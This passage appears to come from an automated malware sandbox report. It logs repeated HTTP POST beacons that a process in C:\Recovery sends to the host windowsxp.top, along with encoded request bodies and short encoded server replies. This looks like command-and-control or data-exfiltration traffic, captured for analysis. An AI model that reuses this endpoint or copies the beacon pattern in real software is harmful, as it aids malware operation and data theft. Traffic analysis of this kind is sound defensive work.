                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:04.051330090 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:04.400684118 CET1008OUTData Raw: 55 54 5d 59 5e 52 53 52 54 58 57 54 54 55 5b 58 59 5c 5b 5b 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UT]Y^RSRTXWTTU[XY\[[RSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&>$"*%"7-#0(?;>(S=8W"2#_87Y*/%./!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:04.655396938 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:04.854984999 CET770INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21DYQJfVhBlil6WUcBlyKf3SFUvvjcnz1B0FQ9fRBnOiKlcF7226MXWPSEWDw5lLR10fFCQFEsnFLc702GrmApxt%2FcDj9YsmnEDEi9kycLmXNTEdQdMYFOsQI6nG%2BrKv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b88cb8a3cb75-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1126848&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  90192.168.2.450103188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:07.482633114 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:07.871526957 CET1012OUTData Raw: 55 53 58 5f 5e 52 53 54 54 58 57 54 54 53 5b 5b 59 50 5b 51 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USX_^RSTTXWTTS[[YP[QR^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&7!9%X"4^-4_0(#8><# !3X,;Z>),/!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:08.085985899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:08.298078060 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3evz9vgncM21DTp9y3EKJsoWuukBOthQ4Q3mHRhZm4KqnwlOdkeC9O9ImKnqaeQbQGpTcI4G4staE19Ng0Blgu%2FFofbmLEG2wS9ZAqf7%2FVxVbUshRS1tjfSO%2FrMc5798"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a229e4346d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1217830&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  91192.168.2.450104188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:07.938731909 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:08.290272951 CET1716OUTData Raw: 50 56 58 5e 5e 53 56 5f 54 58 57 54 54 56 5b 5e 59 50 5b 5a 52 53 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVX^^SV_TXWTTV[^YP[ZRSRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%X"*Y5.0^';+/S)/(W4/X/[(=,"[9!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:08.543351889 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:08.735501051 CET921INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObFYAdmFQ0K2NobIQRCQzSE9YTYg9EsC42eKdnRN8nj8AahQkhtozxLAZxf3JK6uaDSt8AoCk3%2Fu6ytMWgphLVXKn0fV64RENKJHkMyQ5%2B2CPGvGONlZWXDP93u%2FszB9"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a50af28d29-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1153784&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 07 37 07 30 11 3d 02 3d 56 3e 0f 0f 58 33 3f 32 01 3b 21 33 03 29 03 35 12 2e 28 00 1c 27 1d 35 0b 28 2a 3b 00 23 2d 24 57 3d 1f 21 5e 00 1c 24 06 36 3d 21 51 25 5d 3c 5a 30 30 28 5c 21 03 20 07 29 10 0b 55 3c 29 27 07 3c 5e 30 09 2f 3f 2d 1f 25 29 3a 5a 2c 28 29 07 3f 10 2a 54 0c 14 21 11 39 01 33 03 22 21 25 54 3e 0c 1a 11 27 3d 23 0b 30 14 37 0d 3f 12 23 59 3f 13 31 58 21 2c 23 04 3c 16 22 14 27 5b 23 10 3e 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!70==V>X3?2;!3)5.('5(*;#-$W=!^$6=!Q%]<Z00(\! )U<)'<^0/?-%):Z,()?*T!93"!%T>'=#07?#Y?1X!,#<"'[#>>"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  92192.168.2.450105188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:08.416589975 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:08.774347067 CET1012OUTData Raw: 50 56 5d 5f 5b 5f 53 53 54 58 57 54 54 54 5b 5d 59 58 5b 5e 52 52 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV]_[_SSTXWTTT[]YX[^RRR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%-(!\)Y"6.$Y'(;-.+>?#",[7[),/!Y##X('
                                                                                                                  Oct 27, 2024 19:24:09.005068064 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:09.198709011 CET776INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65%2FHkWdpKgLy%2BlqH3JW4C3s0l%2F1IRW2dkawJlp%2FLuGUYXur11gI0XMylgc6YZLzTZq3fSvEQBOqbSIrVe%2FojUGAYcpPsZcA7BWJ3O9v87QP3q0ap4gyWjQfbZFuzNQMY"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8a7ebbf6b04-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1310407&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  93192.168.2.450106188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:09.350784063 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:09.696307898 CET1008OUTData Raw: 55 52 5d 59 5e 5e 56 56 54 58 57 54 54 55 5b 5c 59 5f 5b 5f 52 50 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^^VVTXWTTU[\Y_[_RPR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2.0Y 95_"6Z.$^;-> W(/ T 2#8.<>5,?!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:09.949908018 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:10.166029930 CET777INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=io%2BldVK0y41g2OgWKAI7OFYHZ%2BC80vKCdz9oM%2BSDquJB%2BIc6uuxqUEkgvGuqvvNIk6aLxs4ipK4JL%2F5fc7v6YyMgm3VnIFKYOk4DPkT13T1Vn4HazbSHVyNoHrS%2FDRzf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8adcbf30bcf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1747&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=891076&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  94192.168.2.450107188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:10.289185047 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:10.633781910 CET1012OUTData Raw: 50 55 58 5a 5b 59 53 53 54 58 57 54 54 51 5b 5d 59 58 5b 59 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXZ[YSSTXWTTQ[]YX[YRQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%5:!_68\:' ^$<V/ U=? V"! ->7Y>Z"^,/!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:10.885483980 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:11.088818073 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4MWK9DNNCAns8JY92mA5XN0x%2FbLUlGZhKLUXAOlad6opN38%2FuyTHCv31wuSqTVA6%2BCnXRjFO3CzWKOnIPRA2xuALyOqarr8NAT4Op6%2BhPOsR9qpaeiowshzO%2BP2zgVN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8b3ae514614-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1364750&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  95192.168.2.450108188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:11.218549967 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:11.571166992 CET1012OUTData Raw: 50 52 5d 5f 5b 5c 56 55 54 58 57 54 54 5d 5b 5a 59 5a 5b 51 52 52 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]_[\VUTXWTT][ZYZ[QRRR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1"96!.7'+;$>Q#13/-8>,>Z-!Y##X(
                                                                                                                  Oct 27, 2024 19:24:11.823554993 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:12.024328947 CET768INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ldQPGUSPMkKqdTIblfnwMqyWih9PM7gKNJxiTffKaZ5nmKsjCYP8S%2FWFzdDi15ydY6YRiYmwjn69CxjLMYgEArLFPcYtIwOSDMjUYr6jVgUnkUYQKD8zhgEiUD5ZMbq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8b98b536b44-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1355805&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  96192.168.2.450109188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:12.157521963 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:12.508647919 CET1012OUTData Raw: 50 50 58 5a 5e 5b 56 52 54 58 57 54 54 57 5b 53 59 5b 5b 51 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXZ^[VRTXWTTW[SY[[QRSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1#59=X56+.4'(-.?)Q7?^--3=/:X:!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:12.752188921 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:13.064238071 CET779INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDZ5uQTPEQ8%2BU%2F2FF9%2Brnah5CenBOKAnuZKDHtgpreuTP9QWy5dO3B4iIOFR%2BtdzZSeqd9fS%2FSZK07sikmvwIyaCsnMHvqK0uNtUnhK%2FYc%2FpLAfItgWWpIYinK7cXuxU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8bf58a54636-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1923&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=768577&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  97192.168.2.450110188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:13.187891006 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:13.542790890 CET1012OUTData Raw: 50 55 58 5a 5e 53 56 56 54 58 57 54 54 56 5b 53 59 5c 5b 58 52 51 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXZ^SVVTXWTTV[SY\[XRQR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[&?"1^55([.4$<U8>8=/7#;Y;="X,?!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:13.798648119 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.021791935 CET780INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tso1GI1FhoWI%2F4LBfagwonB1L%2F1s%2FEsE3O89vRcYWbp407rFlL%2FPl9VbhnV4u1nEuio8s%2Fw%2F7kkOS%2BK9So4CwZETaQRUz4ByhHDlXajZb2l7d9Hth8PyIrD4L4OVPHMD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8c5d94e6c69-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1376425&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  98192.168.2.450111188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:13.751929998 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1692
                                                                                                                  Expect: 100-continue
